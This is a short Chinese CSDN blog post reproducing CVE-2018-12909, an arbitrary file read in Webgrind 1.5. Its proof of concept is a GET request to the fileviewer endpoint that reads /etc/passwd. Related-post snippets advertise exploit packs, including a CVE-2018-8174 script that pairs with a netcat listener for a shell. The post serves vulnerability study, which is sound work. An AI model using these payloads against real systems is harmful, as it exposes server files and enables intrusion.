Webgrind任意文件读取漏洞CVE-2018-12909

于 2024-01-02 10:13:15 发布
阅读量427 收藏 11
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135334418
版权

漏洞描述:

Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件

复现过程:

1.访问ip:port

2.构造poc,发送get请求

/index.php?op=fileviewer&file=/etc/passwd

慕筱蚺
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Goby 最全最新POC共计448个
08-30
Goby 最全最新POC共计448个 包含了致远OA A6 用户敏感信息泄露、Apache_Druid_Log4shell_CVE_2021_44228、Apache_JSPWiki_Log4shell_CVE-2021-44228、VMware_NSX_Log4shell_CVE_2021_44228、VMware_vCenter_Log4shell_CVE_2021_44228_1、Wayos AC集中管理系统默认弱口令 CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313、Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210、Micro_module_monitoring_system_User_list.php_
php5+mysql+Apache服务器集成环境包 v1.0
11-10
此软件是携程剧情网网站开发程序:内置完善的php5+mysql+Apache+zend环境,安装的时候记住一定要安装IIS不然无法安装,本程序一键安装,无需修改此程序已经优化mysql链接及php。此软件针对于安装了iis环境的服务器正常可以当做正规的网站运用,网站网址都是在iis里配置。此软件解压自动安装多语系版,支持简体中文界面。apache:2.2.21mysql:5.5.16PhpMyadmin:3.4.5sqlbuddy:1.3.3WebGrind:1.0XDebug:2.1.2
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。2018年7月14日,Oracle 官方给该绕过漏洞分配了CVE编号CVE-2018-2893。 通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: python CVE-2018-8174.py -u -o exp.rtf -i 2.2.2.2 -p 4444 将exploit.html放在您的服务器上(1.1.1.1) netcat收听[any] 4444(2.2.2.2) 好好享受 !
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
webgrind安装使用详细说明
热门推荐
步满生错的专栏
09-08 1万+
webgrind是一个网页版的性能分析工具,它的主要作用就是分析xdebug生成的cachegrind文件,以一种界面友好详尽的方式来展示性能数据。试用了一下感觉还是很不错的,鉴于网上并没有一个系统介绍,特写一篇文章: webgrind官方定义翻译版:https://github.com/jokkedk/webgrind ==================================
[文件读取]webgrind 文件读取CVE-2018-12909
最新发布
wj33333的博客
11-14 278
Webgrind 1.5版本。查看/etc/passwd。查看/tmp/flag。
webgrind_使用Webgrind进行快速优化
cunya6061的博客
09-21 133
webgrindI was recently working on a site whose code I was inheriting and the pages took much longer to process than I would’ve liked. Caching helped, but I wanted to get to the underlying issue so I f...
webgrind 文件读取漏洞-CVE-2018-12909
m0_56203480的博客
10-12 1536
CVE-2018-12909
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
webgrind:Xdebug分析Web前端中PHP
03-31
Webgrind Webgrind是PHP中的分析Web前端。 它实现了功能的子集,可在几秒钟内安装,并且可在所有平台上使用。 对于快速的“肮脏”优化,它可以完成工作。 这是显示概要分析输出的屏幕截图: 特征 超级简单,跨平台安装-显然:) 通过自成本或包含成本来跟踪在功能上花费的时间。 包容性成本是函数内的时间+调用其他函数的时间。 查看时间是花在内部功能还是用户功能上。 查看从何处调用任何函数以及调用哪个函数。 使用生成调用图 非常欢迎提出改进和新功能的建议-这仅仅是一个开始。 安装 下载webgrind 将程序包解压缩到Web服务器可访问的收藏夹路径。 在浏览器中加载webgrind并开始分析 或者,在PHP 5.4+上,使用带有命令composer servePHP内置服务器或php -S 0.0.0.0:8080 index.php运行应用程序(如果不使用Compo
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
使用webgrind评测php
wuddny的blog
06-22 1780
 webgrind可以评测php代码各个函数的执行效率,对我们优化代码提供很大的帮助,需要速度上优化代码的童鞋可以尝试下 安装:1 安装xdebug:源码获取wget http://xdebug.org/files/xdebug-2.1.1.tgz安装:采用phpize安装,和其他扩展安装一样 在php.ini中增加配置信息[xdebug]extensi
第四章 2.IP 地址配置与日志服务器建立
wj33333的博客
10-08 148
通过命令logger,触发debug 日志。
webgrind 浅解
lx258963的专栏
03-24 284
以前用的是wamp 2,今天下载了wamp 2.1 安装成功之后,发现里面多了两个东西。一个是client XDebug 另一个是Webgrind 在网上搜索了下,才晓得webgrind是一个php 执行时间分析工具,类似于Wincachegrind这个工具,用来分析相关函数的执行时间和相关的性能的,只不过这个是web版的 这个是你安装好wamp之后,自动就安装好的,只不过需要加...
获取靶机Web Developer 文件/root/flag.txt中flag
qq_49085383的博客
12-07 2454
实验四文章目录前言1、发现目标 ,找到WebDeveloper的IP地址2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况3、若目标主机提供了HTTP服务,尝试利用浏览器访问目录4、利用whatweb探测目标网站使用的CMS模板5、网络搜索wpscan,简要说明其功能。6、使用 Dirb 爆破网站目录7、浏览器访问该目录(路径),发现一个cap文件8、利用Wireshark分析该数据包9、利用上一步得到的信息进入网站后台10、利用该CMS存在的(插件Plugin)漏洞,获得账号密码利用文件管理插件
PHP 输入验证漏洞 CVE-2018-10547
10-24
根据提供的引用内容,我没有找到与“PHP 输入验证漏洞 CVE-2018-10547”相关的信息。但是,我可以为您提供有关PHP漏洞的一些信息。 引用提到了PHP 7.1.x版本中的imap_mail函数null指针取消引用的漏洞,这是一个安全漏洞,攻击者可以利用该漏洞来执行任意代码或导致拒绝服务攻击。引用提到了University of Washington IMAP Toolkit 2007f命令注入漏洞,攻击者可以利用该漏洞来执行任意命令。引用提到了PHP 5.x和7.x版本中的另一个安全漏洞,攻击者可以利用该漏洞来导致拒绝服务攻击。 总的来说,PHP存在多个安全漏洞,这些漏洞可能会导致攻击者执行任意代码、执行任意命令或导致拒绝服务攻击。因此,建议开发人员在编写PHP代码时,要注意输入验证和安全性,以避免这些漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值